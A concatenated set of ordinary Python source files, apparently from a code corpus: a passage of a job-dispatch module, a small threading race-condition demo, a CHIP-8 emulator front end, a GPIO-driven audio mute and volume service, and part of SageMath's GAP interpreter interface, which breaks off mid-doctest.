# Get the job object and append to watch queue
jobs_to_check.append( ( self.sa_session.query( model.Job ).get( job_id ), error_msg ) )
except Empty:
pass
for job, error_msg in jobs_to_check:
if ( job.state not in
( job.states.DELETED_NEW,
job.states.DELETED ) and
job.finished ):
# terminated before it got here
log.debug('Job %s already finished, not deleting or stopping', job.id)
continue
final_state = job.states.DELETED
if error_msg is not None:
final_state = job.states.ERROR
job.info = error_msg
job.set_final_state( final_state )
self.sa_session.add( job )
self.sa_session.flush()
if job.job_runner_name is not None:
# tell the dispatcher to stop the job
self.dispatcher.stop( job )
def put( self, job_id, error_msg=None ):
if not self.app.config.track_jobs_in_database:
self.queue.put( ( job_id, error_msg ) )
def shutdown( self ):
"""Attempts to gracefully shut down the worker thread"""
if self.parent_pid != os.getpid():
# We're not the real job queue, do nothing
return
else:
log.info( "sending stop signal to worker thread" )
self.running = False
if not self.app.config.track_jobs_in_database:
self.queue.put( self.STOP_SIGNAL )
self.sleeper.wake()
log.info( "job handler stop queue stopped" )
class DefaultJobDispatcher( object ):
def __init__( self, app ):
self.app = app
self.job_runners = self.app.job_config.get_job_runner_plugins( self.app.config.server_name )
# Once plugins are loaded, all job destinations that were created from
# URLs can have their URL params converted to the destination's param
# dict by the plugin.
self.app.job_config.convert_legacy_destinations(self.job_runners)
log.debug( "Loaded job runners plugins: " + ':'.join( self.job_runners.keys() ) )
def __get_runner_name( self, job_wrapper ):
if job_wrapper.can_split():
runner_name = "tasks"
else:
runner_name = job_wrapper.job_destination.runner
return runner_name
def url_to_destination( self, url ):
"""This is used by the runner mapper (a.k.a. dynamic runner) and
recovery methods to have runners convert URLs to destinations.
New-style runner plugin IDs must match the URL's scheme for this to work.
"""
runner_name = url.split(':', 1)[0]
try:
return self.job_runners[runner_name].url_to_destination(url)
except Exception as e:
log.exception("Unable to convert legacy job runner URL '%s' to job destination, destination will be the '%s' runner with no params: %s" % (url, runner_name, e))
return JobDestination(runner=runner_name)
def put( self, job_wrapper ):
runner_name = self.__get_runner_name( job_wrapper )
try:
if isinstance(job_wrapper, TaskWrapper):
# DBTODO Refactor
log.debug( "(%s) Dispatching task %s to %s runner" % ( job_wrapper.job_id, job_wrapper.task_id, runner_name ) )
else:
log.debug( "(%s) Dispatching to %s runner" % ( job_wrapper.job_id, runner_name ) )
self.job_runners[runner_name].put( job_wrapper )
except KeyError:
log.error( 'put(): (%s) Invalid job runner: %s' % ( job_wrapper.job_id, runner_name ) )
job_wrapper.fail( DEFAULT_JOB_PUT_FAILURE_MESSAGE )
def stop( self, job ):
"""
Stop the given job. The input variable job may be either a Job or a Task.
"""
# The Job and Task classes have been modified so that their accessors
# will return the appropriate value.
# Note that Jobs and Tasks have runner_names, which are distinct from
# the job_runner_name and task_runner_name.
if ( isinstance( job, model.Job ) ):
log.debug( "Stopping job %d:", job.get_id() )
elif( isinstance( job, model.Task ) ):
log.debug( "Stopping job %d, task %d"
% ( job.get_job().get_id(), job.get_id() ) )
else:
log.debug( "Unknown job to stop" )
# The runner name is not set until the job has started.
# If we're stopping a task, then the runner_name may be
# None, in which case it hasn't been scheduled.
if ( job.get_job_runner_name() is not None ):
runner_name = ( job.get_job_runner_name().split( ":", 1 ) )[ 0 ]
if ( isinstance( job, model.Job ) ):
log.debug( "stopping job %d in %s runner" % ( job.get_id(), runner_name ) )
elif ( isinstance( job, model.Task ) ):
log.debug( "Stopping job %d, task %d in %s runner"
% ( job.get_job().get_id(), job.get_id(), runner_name ) )
try:
self.job_runners[runner_name].stop_job( job )
except KeyError:
log.error( 'stop(): (%s) Invalid job runner: %s' % ( job.get_id(), runner_name ) )
# Job and output dataset states have already been updated, so nothing is done here.
def recover( self, job, job_wrapper ):
runner_name = ( job.job_runner_name.split(":", 1) )[0]
log.debug( "recovering job %d in %s runner" % ( job.get_id(), runner_name ) )
try:
self.job_runners[runner_name].recover( job, job_wrapper )
except KeyError:
log.error( 'recover(): (%s) Invalid job runner: %s' % ( job_wrapper.job_id, runner_name ) )
job_wrapper.fail( DEFAULT_JOB_PUT_FAILURE_MESSAGE )
def shutdown( self ):
for runner in self.job_runners.itervalues():
runner.shutdown()
|
thread_05_1.py
|
# thread_05_1.py
import threading
Q = 100000
thread_list = []
def drink(max):
global Q
for i in range(0, max):
Q -= 1
for i in range(0, 2):
thread_inst = threading.Thread(target=drink, args=(50000,))
thread_list.append(thread_inst) # 생성된 쓰레드를 thread_list에 저장
thread_inst.start() # 쓰레드 실행
for thread in thread_list:
thread.join() # 리스트 thread_list에 있는 쓰레드가 종료될 때까지 대기
print(Q) # Q의 값 출력
|
Chip8Mini.py
|
# Chip8Mini v0.1: A CHIP8 emulator in Pyxel/Python
# Copyright (c) 2022 Kumogata Computing Laboratory.
# All Rights Reserved.
import pyxel
import threading
from System import *
class Chip8Mini:
# Constants
width = 64
height = 32
cabinet_width = 80
cabinet_height = 120
# 0: amabie 1: breakout 2: reserved 3: reserved
# 4: reserved 5: reserved 6: reserved 7: reserved
theme = 1
# References
_Sys = None
# ------------------------------------------------------------
# Main Routine
# ------------------------------------------------------------
# Constructor
def __init__( self ):
pyxel.init( self.cabinet_width, self.cabinet_height,
title="Chip8Mini v0.1", fps=20)
if self.theme == 0:
pyxel.load( "Amabie.pyxres")
elif self.theme == 1:
pyxel.load( "Breakout.pyxres")
# Create Chip8's System
self._Sys = System()
# Initialize Chip8's System
if ( len( sys.argv ) < 2 or
self._Sys.Init( self, sys.argv[ 1 ] ) < 0 ) :
# Failed
print ("Usage: python " + sys.argv[ 0 ] + " <ROM file name>")
sys.exit()
# Start Chip8's System
threading.Thread(target=self._Sys.Run, args=()).start()
# Start Pyxel's System
pyxel.run(self.update,self.draw)
def update( self ):
# Key Events
self.update_key_press()
self.update_key_release()
def draw( self ):
pyxel.cls(0)
pyxel.blt(0, 0, 0, 0, 0, self.cabinet_width, self.cabinet_height)
for _y in range( self.height ) :
for _x in range( self.width ) :
if ( self._Sys._PPU.PPU_GetPixel( _x, _y ) ) :
# Draw Rectangle
pyxel.pset( _x+8,_y+24,13)
else :
# Draw None
pyxel.pset( _x+8,_y+24,1)
# Original |1|2|3|C| Mapping to |1|2|3|4|
# |4|5|6|D| |Q|W|E|R|
# |7|8|9|E| |A|S|D|F|
# |A|0|B|F| |Z|X|C|V|
# Key Pressed
def update_key_press( self ):
if pyxel.btnp( pyxel.KEY_X ) :
self._Sys._IO.Key |= ( 1 << 0 )
if pyxel.btnp( pyxel.KEY_1 ) :
self._Sys._IO.Key |= ( 1 << 1 )
if pyxel.btnp( pyxel.KEY_2 ) :
self._Sys._IO.Key |= ( 1 << 2 )
if pyxel.btnp( pyxel.KEY_3 ) :
self._Sys._IO.Key |= ( 1 << 3 )
if pyxel.btnp( pyxel.KEY_Q ) :
self._Sys._IO.Key |= ( 1 << 4 )
if pyxel.btnp( pyxel.KEY_W ) :
self._Sys._IO.Key |= ( 1 << 5 )
if pyxel.btnp( pyxel.KEY_E ) :
self._Sys._IO.Key |= ( 1 << 6 )
if pyxel.btnp( pyxel.KEY_A ) :
self._Sys._IO.Key |= ( 1 << 7 )
if pyxel.btnp( pyxel.KEY_S ) :
self._Sys._IO.Key |= ( 1 << 8 )
if pyxel.btnp( pyxel.KEY_D ) :
self._Sys._IO.Key |= ( 1 << 9 )
if pyxel.btnp( pyxel.KEY_Z ) :
self._Sys._IO.Key |= ( 1 << 10 )
if pyxel.btnp( pyxel.KEY_C ) :
self._Sys._IO.Key |= ( 1 << 11 )
if pyxel.btnp( pyxel.KEY_4 ) :
self._Sys._IO.Key |= ( 1 << 12 )
if pyxel.btnp( pyxel.KEY_R ) :
self._Sys._IO.Key |= ( 1 << 13 )
if pyxel.btnp( pyxel.KEY_F ) :
self._Sys._IO.Key |= ( 1 << 14 )
if pyxel.btnp( pyxel.KEY_V ) :
self._Sys._IO.Key |= ( 1 << 15 )
# Key Released
def update_key_release( self ):
if pyxel.btnr( pyxel.KEY_X ) :
self._Sys._IO.Key &= ~( 1 << 0 )
if pyxel.btnr( pyxel.KEY_1 ) :
self._Sys._IO.Key &= ~( 1 << 1 )
if pyxel.btnr( pyxel.KEY_2 ) :
self._Sys._IO.Key &= ~( 1 << 2 )
if pyxel.btnr( pyxel.KEY_3 ) :
self._Sys._IO.Key &= ~( 1 << 3 )
if pyxel.btnr( pyxel.KEY_Q ) :
self._Sys._IO.Key &= ~( 1 << 4 )
if pyxel.btnr( pyxel.KEY_W ) :
self._Sys._IO.Key &= ~( 1 << 5 )
if pyxel.btnr( pyxel.KEY_E ) :
self._Sys._IO.Key &= ~( 1 << 6 )
if pyxel.btnr( pyxel.KEY_A ) :
self._Sys._IO.Key &= ~( 1 << 7 )
if pyxel.btnr( pyxel.KEY_S ) :
self._Sys._IO.Key &= ~( 1 << 8 )
if pyxel.btnr( pyxel.KEY_D ) :
self._Sys._IO.Key &= ~( 1 << 9 )
if pyxel.btnr( pyxel.KEY_Z ) :
self._Sys._IO.Key &= ~( 1 << 10 )
if pyxel.btnr( pyxel.KEY_C ) :
self._Sys._IO.Key &= ~( 1 << 11 )
if pyxel.btnr( pyxel.KEY_4 ) :
self._Sys._IO.Key &= ~( 1 << 12 )
if pyxel.btnr( pyxel.KEY_R ) :
self._Sys._IO.Key &= ~( 1 << 13 )
if pyxel.btnr( pyxel.KEY_F ) :
self._Sys._IO.Key &= ~( 1 << 14 )
if pyxel.btnr( pyxel.KEY_V ) :
self._Sys._IO.Key &= ~( 1 << 15 )
# Main
Chip8Mini()
|
audioService.py
|
import zmq
import time
import sys
from matrix_io.proto.malos.v1 import driver_pb2
from pyObj import Data
from matrix_io.proto.malos.v1 import io_pb2
from multiprocessing import Process
from zmq.eventloop import ioloop, zmqstream
from callbacks import register_data_callback, driver_keep_alive
from mixer import Mixer
matrix_ip = '127.0.0.1' #IP of the matrix
gpio_port = 20049 #Port for the GPIO
context = zmq.Context()
socket = context.socket(zmq.PUSH)
socket.connect('tcp://{0}:{1}'.format(matrix_ip, gpio_port)) #Connect to zmq server
mixer = Mixer() #Open a sound mixer
audioToggleMute = 0 #Matrix GPIO pin 0
audioLevelDown = 1 #Matrix GPIO pin 0
audioLevelUp = 2 #Matrix GPIO pin 0
mikeToggleMute = 3 #Matrix GPIO pin 0
decreaseLevel = -2 #Reduces volume by x
increaseLevel = 2 #Increases volume by x
def config_gpio_read():
""" Send driver configuration to Matrix """
config = driver_pb2.DriverConfig()
config.delay_between_updates = 0.1 #0.1 seconds
config.timeout_after_last_ping = 5 #5 seconds
socket.send(config.SerializeToString())
reset = True #Boolean to know if volume buttons is pressed
toggleMic = True #Boolean to know if mic button is pressed
toggleOut = True #Boolean to know if out button is pressed
ledContext = zmq.Context()
ledService = ledContext.socket(zmq.REQ)
ledService.connect ("tcp://localhost:1337")
def gpio_callback(msg):
"""
Recieve the updated GPIO values and act upon the pressed button
Will mute audio, change volume intensity and mute the microphone
"""
data = io_pb2.GpioParams().FromString(msg[0])
gpioValues = ('{0:016b}'.format(data.values))
gpioValues = gpioValues[::-1]
gpioValues = list(gpioValues)
global ledService
global reset
global toggleMic
global toggleOut
if gpioValues[audioToggleMute] == '0' and toggleOut == True:
#If the audio mute button is pressed mute the speakers and show audio mute leds
if mixer.toggleOutMute():
ledService.send_pyobj(Data("mute", mixer._outMuted, mixer._inMuted, loop=True, force=True))
elif not mixer._outMuted and mixer._inMuted:
ledService.send_pyobj(Data("mute", mixer._outMuted, mixer._inMuted, loop=True, force=True))
else:
#If nothing is muted reset the leds once.
ledService.send_pyobj(Data(force=True))
ledService.recv()
#Toggle to know we are currently pressing the button.
toggleOut = False
elif gpioValues[audioLevelDown] == '0' and not mixer._outMuted and not mixer._inMuted:
#If the audio level down button is pressed decrease the volume and show an animation
mixer.setVolume(decreaseLevel)
#Toggle to know when the volume button is pressed
reset = False
ledService.send_pyobj(Data("volume", int((18/100)*mixer._outLevel), loop=True))
ledService.recv()
elif gpioValues[audioLevelUp] == '0' and not mixer._outMuted and not mixer._inMuted:
#If the audio level up button is pressed increase the volume and show an animation
mixer.setVolume(increaseLevel)
#Toggle to know when the volume button is pressed
reset = False
ledService.send_pyobj(Data("volume", int((18/100)*mixer._outLevel), loop=True))
ledService.recv()
elif gpioValues[mikeToggleMute] == '0' and toggleMic == True:
#If the microphone mute button is pressed mute the microphone and show audio mute leds
if mixer.toggleMike():
ledService.send_pyobj(Data("mute", mixer._outMuted, mixer._inMuted, loop=True, force=True))
elif mixer._outMuted and not mixer._inMuted:
ledService.send_pyobj(Data("mute", mixer._outMuted, mixer._inMuted, loop=True, force=True))
else:
#If nothing is muted reset the leds once.
ledService.send_pyobj(Data(force=True))
ledService.recv()
toggleMic = False
elif reset == False:
ledService.send_pyobj(Data())
ledService.recv()
reset = True
elif toggleOut == False and gpioValues[audioToggleMute] == '1':
toggleOut = True
elif toggleMic == False and gpioValues[mikeToggleMute] == '1':
toggleMic = True
if __name__ == "__main__":
ioloop.install()
#Keep the connection alive
Process(target=driver_keep_alive, args=(matrix_ip, gpio_port, 1)).start()
#Configure the gpio read interval
config_gpio_read()
#Connect to the Matrix GPIO server
context = zmq.Context()
socket = context.socket(zmq.SUB)
data_port = gpio_port + 3
socket.connect('tcp://{0}:{1}'.format(matrix_ip, data_port))
socket.setsockopt(zmq.SUBSCRIBE, b'')
stream = zmqstream.ZMQStream(socket)
#Wait for a stream of data to come
stream.on_recv(gpio_callback)
#Loop
ioloop.IOLoop.instance().start()
|
gap.py
|
# -*- coding: utf-8 -*-
r"""
Interface to GAP
Sage provides an interface to the GAP system. This system provides
extensive group theory, combinatorics, etc.
The GAP interface will only work if GAP is installed on your
computer; this should be the case, since GAP is included with Sage.
The interface offers three pieces of functionality:
#. ``gap_console()`` - A function that dumps you into
an interactive command-line GAP session.
#. ``gap(expr)`` - Evaluation of arbitrary GAP
expressions, with the result returned as a string.
#. ``gap.new(expr)`` - Creation of a Sage object that
wraps a GAP object. This provides a Pythonic interface to GAP. For
example, if ``f=gap.new(10)``, then
``f.Factors()`` returns the prime factorization of
`10` computed using GAP.
First Examples
--------------
We factor an integer using GAP::
sage: n = gap(20062006); n
20062006
sage: n.parent()
Gap
sage: fac = n.Factors(); fac
[ 2, 17, 59, 73, 137 ]
sage: fac.parent()
Gap
sage: fac[1]
2
GAP and Singular
----------------
This example illustrates conversion between Singular and GAP via
Sage as an intermediate step. First we create and factor a Singular
polynomial.
::
sage: singular(389)
389
sage: R1 = singular.ring(0, '(x,y)', 'dp')
sage: f = singular('9*x^16-18*x^13*y^2-9*x^12*y^3+9*x^10*y^4-18*x^11*y^2+36*x^8*y^4+18*x^7*y^5-18*x^5*y^6+9*x^6*y^4-18*x^3*y^6-9*x^2*y^7+9*y^8')
sage: F = f.factorize()
sage: print(F)
[1]:
_[1]=9
_[2]=x^6-2*x^3*y^2-x^2*y^3+y^4
_[3]=-x^5+y^2
[2]:
1,1,2
Next we convert the factor `-x^5+y^2` to a Sage
multivariate polynomial. Note that it is important to let
`x` and `y` be the generators of a polynomial ring,
so the eval command works.
::
sage: R.<x,y> = PolynomialRing(QQ,2)
sage: s = F[1][3].sage_polystring(); s
'-x**5+y**2'
sage: g = eval(s); g
-x^5 + y^2
Next we create a polynomial ring in GAP and obtain its
indeterminates::
sage: R = gap.PolynomialRing('Rationals', 2); R
PolynomialRing( Rationals, ["x_1", "x_2"] )
sage: I = R.IndeterminatesOfPolynomialRing(); I
[ x_1, x_2 ]
In order to eval `g` in GAP, we need to tell GAP to view
the variables ``x0`` and ``x1`` as the two
generators of `R`. This is the one tricky part. In the GAP
interpreter the object ``I`` has its own name (which
isn't ``I``). We can access its name using
``I.name()``.
::
sage: _ = gap.eval("x := %s[1];; y := %s[2];;"%(I.name(), I.name()))
Now `x_0` and `x_1` are defined, so we can
construct the GAP polynomial `f` corresponding to
`g`::
sage: R.<x,y> = PolynomialRing(QQ,2)
sage: f = gap(str(g)); f
-x_1^5+x_2^2
We can call GAP functions on `f`. For example, we evaluate
the GAP ``Value`` function, which evaluates `f`
at the point `(1,2)`.
::
sage: f.Value(I, [1,2])
3
sage: g(1,2) # agrees
3
Saving and loading objects
--------------------------
Saving and loading GAP objects (using the dumps method, etc.) is
*not* supported, since the output string representation of Gap
objects is sometimes not valid input to GAP. Creating classes that
wrap GAP objects *is* supported, via simply defining the a
_gap_init_ member function that returns a string that when
evaluated in GAP constructs the object. See
``groups/perm_gps/permgroup.py`` for a nontrivial
example of this.
Long Input
----------
The GAP interface reads in even very long input (using files) in a
robust manner, as long as you are creating a new object.
.. note::
Using ``gap.eval`` for long input is much less robust, and is not
recommended.
::
sage: t = '"%s"'%10^10000 # ten thousand character string.
sage: a = gap(t)
Changing which GAP is used
--------------------------
Use this code to change which GAP interpreter is run. E.g.,
::
import sage.interfaces.gap
sage.interfaces.gap.gap_cmd = "/usr/local/bin/gap"
AUTHORS:
- David Joyner and William Stein: initial version(s)
- William Stein (2006-02-01): modified gap_console command so it uses
exactly the same startup command as Gap.__init__.
- William Stein (2006-03-02): added tab completions: gap.[tab], x =
gap(...), x.[tab], and docs, e.g., gap.function? and x.function?
"""
#*****************************************************************************
# Copyright (C) 2005 William Stein <[email protected]>
#
# Distributed under the terms of the GNU General Public License (GPL)
#
# This code is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# The full text of the GPL is available at:
#
# http://www.gnu.org/licenses/
#*****************************************************************************
from .expect import Expect, ExpectElement, FunctionElement, ExpectFunction
from .gap_workspace import gap_workspace_file, prepare_workspace_dir
from sage.cpython.string import bytes_to_str
from sage.env import SAGE_EXTCODE
from sage.misc.misc import is_in_string
from sage.misc.cachefunc import cached_method
from sage.docs.instancedoc import instancedoc
from sage.interfaces.tab_completion import ExtraTabCompletion
from sage.structure.element import ModuleElement
import re
import os
import io
import pexpect
import time
import platform
import string
import warnings
WORKSPACE = gap_workspace_file()
first_try = True
gap_cmd = "gap -r"
if platform.processor() == 'ia64' and os.path.exists('/usr/bin/prctl'):
# suppress unaligned access to 0x..., ip=0x... warnings
gap_cmd = 'prctl --unaligned=silent ' + gap_cmd
def gap_command(use_workspace_cache=True, local=True):
if use_workspace_cache:
if local:
return "%s -L %s"%(gap_cmd, WORKSPACE), False
else:
# TO DO: Use remote workspace
return gap_cmd, False
else:
return gap_cmd, True
############ Set the GAP memory pool size
# you should always use get_gap_memory_pool_size() to access this value
gap_memory_pool_size = None
def set_gap_memory_pool_size(size_in_bytes):
"""
Set the desired gap memory pool size.
Subsequently started GAP instances will use this as default.
Already running instances are unchanged.
GAP will only reserve ``size_in_bytes`` address space. Unless you
actually start a big GAP computation, the memory will not be
used. However, corresponding swap space will be reserved so that
GAP will always be able to use the reserved address space if
needed. While nothing is actually written to disc as long as you
don't run a big GAP computation, the reserved swap space will not
be available for other processes.
INPUT:
- ``size_in_bytes`` -- integer. The desired memory pool size.
EXAMPLES::
sage: from sage.interfaces.gap import \
....: get_gap_memory_pool_size, set_gap_memory_pool_size
sage: n = get_gap_memory_pool_size()
sage: set_gap_memory_pool_size(n)
sage: n == get_gap_memory_pool_size()
True
sage: n # random output
1534059315
"""
global gap_memory_pool_size
gap_memory_pool_size = size_in_bytes
def get_gap_memory_pool_size():
"""
Get the gap memory pool size for new GAP processes.
EXAMPLES::
sage: from sage.interfaces.gap import get_gap_memory_pool_size
sage: get_gap_memory_pool_size() # random output
1534059315
"""
global gap_memory_pool_size
if gap_memory_pool_size is not None:
return gap_memory_pool_size
import psutil
from sage.misc.getusage import virtual_memory_limit
mem = psutil.virtual_memory()
swap = psutil.swap_memory()
vmax = virtual_memory_limit()
suggested_size = max(swap.free // 10, mem.available // 50)
# Don't eat all address space if the user set ulimit -v
suggested_size = min(suggested_size, vmax // 10)
# ~220MB is the minimum for long doctests
suggested_size = max(suggested_size, 400 * 1024**2)
return suggested_size
def _get_gap_memory_pool_size_MB():
"""
Return the gap memory pool size suitable for usage on the GAP
command line.
The GAP 4.5.6 command line parser had issues with large numbers, so
we return it in megabytes.
OUTPUT:
String.
EXAMPLES::
sage: from sage.interfaces.gap import \
....: _get_gap_memory_pool_size_MB
sage: _get_gap_memory_pool_size_MB() # random output
'1467m'
"""
pool = get_gap_memory_pool_size()
pool = (pool // (1024**2)) + 1
return str(pool)+'m'
############ Classes with methods for both the GAP3 and GAP4 interface
class Gap_generic(ExtraTabCompletion, Expect):
r"""
Generic interface to the GAP3/GAP4 interpreters.
AUTHORS:
- William Stein and David Joyner (interface for GAP4)
- Franco Saliola (Feb 2010): refactored to separate out the generic
code
"""
_identical_function = "IsIdenticalObj"
def _synchronize(self, timeout=0.5, cmd='%s;'):
"""
Synchronize GAP pexpect interface.
See the base method
:meth:`~sage.interfaces.expect.Expect._synchronize` for more
details.
We override this method since we are looking at GAP package
mode output, which is quite different from the normal
(human-readable) interface.
EXAMPLES::
sage: gap('"ok"')
ok
sage: gap._expect.sendline() # now we are out of sync
1
sage: gap._synchronize()
sage: gap(123)
123
"""
if self._expect is None:
return
E = self._expect
from sage.misc.prandom import randrange
rnd = randrange(2147483647)
cmd = str(rnd)+';'
try:
E.sendline(cmd)
E.expect(r'@[nf][@J\s>]*'+str(rnd), timeout=timeout)
E.send(' ')
E.expect('@i', timeout=timeout)
except pexpect.TIMEOUT:
self.interrupt()
except pexpect.EOF:
self._crash_msg()
self.quit()
def interrupt(self, tries=None, timeout=1, quit_on_fail=True):
"""
Interrupt the GAP process
Gap installs a SIGINT handler, we call it directly instead of
trying to sent Ctrl-C. Unlike
:meth:`~sage.interfaces.expect.Expect.interrupt`, we only try
once since we are knowing what we are doing.
Sometimes GAP dies while interrupting.
EXAMPLES::
sage: gap._eval_line('while(1=1) do i:=1;; od;', wait_for_prompt=False)
''
sage: rc = gap.interrupt(timeout=1)
sage: [ gap(i) for i in range(10) ] # check that it is still working
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
TESTS::
sage: gap('"finished computation"'); gap.interrupt(); gap('"ok"')
finished computation
True
ok
"""
E = self._expect
if E is None:
return True
# GAP oddity: If a computation is running and we send Ctrl-C,
# it is stopped as expected. But if we are at the idle prompt,
# nothing is happening UNTIL we run the next command (which is
# then immediately interrupted).
# There is apparently also a race in GAP between the signal
# handler and input, if we don't wait a bit the result is
# unpredictable.
E.sendline(chr(3))
time.sleep(0.1)
E.sendline()
try:
# send a dummy command
E.sendline('224433409;')
# read everything up to the actual output of the command
E.expect(r'@[nf][@J\s>]*224433409', timeout=timeout)
E.send(' ')
# the following input prompt should be the current input
# prompt but GAP might be too confused to display it
# E.expect('@i', timeout=timeout)
# Ideally, we would be finished here. But sometimes GAP
# thinks it is still inside a do/od block. So we run some
# more plain commands to get back into sync. These might
# either complete successfully (output "@n+<number>") or
# return a "Syntax error: od expected@J@f +<number>"
E.sendline()
time.sleep(0.1)
E.sendline('224433437;')
E.expect(r'@[nf][@J\s>]*224433437', timeout=timeout)
E.sendline()
time.sleep(0.1)
E.sendline('224433479;')
E.expect(r'@[nf][@J\s>]*224433479', timeout=timeout)
E.send(' ')
# the following input prompt is now the current input prompt
E.expect('@i', timeout=timeout)
success = True
except (pexpect.TIMEOUT, pexpect.EOF):
# GAP died or hangs indefinitely
success = False
if not success and quit_on_fail:
self.quit()
return success
def _assign_symbol(self):
r"""
Return the assign symbol in GAP.
TESTS::
sage: gap = Gap()
sage: print(gap._assign_symbol())
:=
"""
return ":="
def _quit_string(self):
"""
Returns the string used to quit GAP.
EXAMPLES::
sage: gap._quit_string()
'quit;'
::
sage: g = Gap()
sage: a = g(2); g.is_running()
True
sage: g.quit()
sage: g.is_running()
False
"""
return 'quit;'
def _read_in_file_command(self, filename):
r"""
Returns the command use to read in a file in GAP.
EXAMPLES::
sage: gap._read_in_file_command('test')
'Read("test");'
::
sage: filename = tmp_filename()
sage: with open(filename, 'w') as f:
....: _ = f.write('xx := 22;\n')
sage: gap.read(filename)
sage: gap.get('xx').strip()
'22'
"""
return 'Read("%s");' % filename
def _continuation_prompt(self):
"""
Returns the continuation prompt in GAP.
EXAMPLES::
sage: gap._continuation_prompt()
'> '
"""
return '> '
def load_package(self, pkg, verbose=False):
"""
Load the Gap package with the given name.
If loading fails, raise a RuntimeError exception.
TESTS::
sage: gap.load_package("chevie")
Traceback (most recent call last):
...
RuntimeError: Error loading Gap package chevie. You may want to install gap_packages SPKG.
"""
if verbose:
print("Loading GAP package {}".format(pkg))
x = self.eval('LoadPackage("{}")'.format(pkg))
if x == 'fail':
raise RuntimeError("Error loading Gap package "+str(pkg)+". "+
"You may want to install gap_packages SPKG.")
def eval(self, x, newlines=False, strip=True, split_lines=True, **kwds):
r"""
Send the code in the string s to the GAP interpreter and return the
output as a string.
INPUT:
- ``s`` - string containing GAP code.
- ``newlines`` - bool (default: True); if False,
remove all backslash-newlines inserted by the GAP output
formatter.
- ``strip`` - ignored
- ``split_lines`` -- bool (default: True); if True then each
line is evaluated separately. If False, then the whole
block of code is evaluated all at once.
EXAMPLES::
sage: gap.eval('2+2')
'4'
sage: gap.eval('Print(4); #test\n Print(6);')
'46'
sage: gap.eval('Print("#"); Print(6);')
'#6'
sage: gap.eval('4; \n 6;')
'4\n6'
sage: gap.eval('if 3>2 then\nPrint("hi");\nfi;')
'hi'
sage: gap.eval('## this is a test\nPrint("OK")')
'OK'
sage: gap.eval('Print("This is a test. Oh no, a #");# but this is a comment\nPrint("OK")')
'This is a test. Oh no, a #OK'
sage: gap.eval('if 4>3 then')
''
sage: gap.eval('Print("Hi how are you?")')
'Hi how are you?'
sage: gap.eval('fi')
''
TESTS:
Whitespace is not stripped from the front of the result
(:trac:`28439`)::
sage: gap.eval(r'Print(" -\n\\\\- ")')
' -\n\\\\-'
"""
# '"
#We remove all of the comments: On each line, we try
#to find a pound sign. If we find it, we check to see if
#it is occurring in a string. If it is not in a string, we
#strip off the comment.
if not split_lines:
input_line=str(x)
else:
input_line = ""
for line in str(x).rstrip().split('\n'):
pound_position = line.find('#')
while pound_position != -1:
if not is_in_string(line, pound_position):
line = line[:pound_position]
pound_position = line.find('#',pound_position+1)
input_line += " "+line
if not input_line.endswith(';'):
input_line += ';'
result = Expect.eval(self, input_line, **kwds)
if not newlines:
result = result.replace("\\\n","")
return result.rstrip()
def _execute_line(self, line, wait_for_prompt=True, expect_eof=False):
if self._expect is None: # interface is down
self._start()
E = self._expect
try:
if len(line) > 4095:
raise RuntimeError("Passing commands this long to gap would hang")
E.sendline(line)
except OSError:
raise RuntimeError("Error evaluating %s in %s"%(line, self))
if not wait_for_prompt:
return (b'',b'')
if len(line)==0:
return (b'',b'')
try:
terminal_echo = [] # to be discarded
normal_outputs = [] # GAP stdout
error_outputs = [] # GAP stderr
current_outputs = terminal_echo
while True:
x = E.expect_list(self._compiled_full_pattern)
current_outputs.append(E.before)
if x == 0: # @p
if E.after != b'@p1.':
warnings.warn(
"possibly wrong version of GAP package "
"interface. Crossing fingers and continuing.")
elif x == 1: #@@
current_outputs.append(b'@')
elif x == 2: #special char
c = ord(E.after[1:2]) - ord(b'A') + 1
s = bytes([c])
current_outputs.append(s)
elif x == 3: # garbage collection info, ignore
pass
elif x == 4: # @e -- break loop
E.sendline("quit;")
elif x == 5: # @c completion, doesn't seem to happen when -p is in use
warnings.warn("I didn't think GAP could do this")
elif x == 6: # @f GAP error message
current_outputs = error_outputs
elif x == 7: # @h help text, but this stopped happening with new help
warnings.warn("I didn't think GAP could do this")
elif x == 8: # @i awaiting normal input
break
elif x == 9: # @m finished running a child
pass # there is no need to do anything
elif x==10: #@n normal output line
current_outputs = normal_outputs
elif x==11: #@r echoing input
current_outputs = terminal_echo
elif x==12: #@sN shouldn't happen
warnings.warn("this should never happen")
elif x==13: #@w GAP is trying to send a Window command
warnings.warn("this should never happen")
elif x ==14: #@x seems to be safely ignorable
pass
elif x == 15:#@z GAP starting a subprocess
pass # there is no need to do anything
except pexpect.EOF:
if not expect_eof:
raise RuntimeError("Unexpected EOF from %s executing %s"%(self,line))
except IOError:
raise RuntimeError("IO Error from %s executing %s"%(self,line))
return (b"".join(normal_outputs), b"".join(error_outputs))
def _keyboard_interrupt(self):
"""
TESTS:
We check that the gap interface behaves correctly after an
interrupt::
sage: gap(2)
2
sage: try:
....: alarm(0.5)
....: gap.eval('while(1=1) do i:=1;; od;', wait_for_prompt=True)
....: except KeyboardInterrupt:
....: pass
sage: gap(2)
2
"""
self.quit()
raise KeyboardInterrupt("Ctrl-c pressed while running %s"%self)
def _eval_line(self, line, allow_use_file=True, wait_for_prompt=True, restart_if_needed=True):
r"""
Evaluate a line of commands.
REMARK:
By default, a long command (length exceeding ``self._eval_using_file_cutoff``)
is evaluated using :meth:`_eval_line_using_file`.
If the command can not be evaluated since the interface
has crashed, it is automatically restarted and tried
again *once*.
If the optional ``wait_for_prompt`` is ``False`` then even a very long line
will not be evaluated by :meth:`_eval_line_using_file`, since this does not
support the ``wait_for_prompt`` option.
INPUT:
- ``line`` -- (string) a command.
- ``allow_use_file`` (optional bool, default ``True``) --
allow to evaluate long commands using :meth:`_eval_line_using_file`.
- ``wait_for_prompt`` (optional bool, default ``True``) --
wait until the prompt appears in the sub-process' output.
- ``restart_if_needed`` (optional bool, default ``True``) --
If it is ``True``, the command evaluation is evaluated
a second time after restarting the interface, if an
``EOFError`` occurred.
TESTS::
sage: gap._eval_line('2+2;')
'4'
We test the ``wait_for_prompt`` option by sending a command that
creates an infinite loop in the GAP sub-process. But if we don't
wait for the prompt to appear in the output, we can interrupt
the loop without raising a KeyboardInterrupt. At the same time,
we test that the line is not forwarded to :meth:`_eval_line_using_file`,
since that method would not support the ``wait_for_prompt`` option::
sage: cutoff = gap._eval_using_file_cutoff
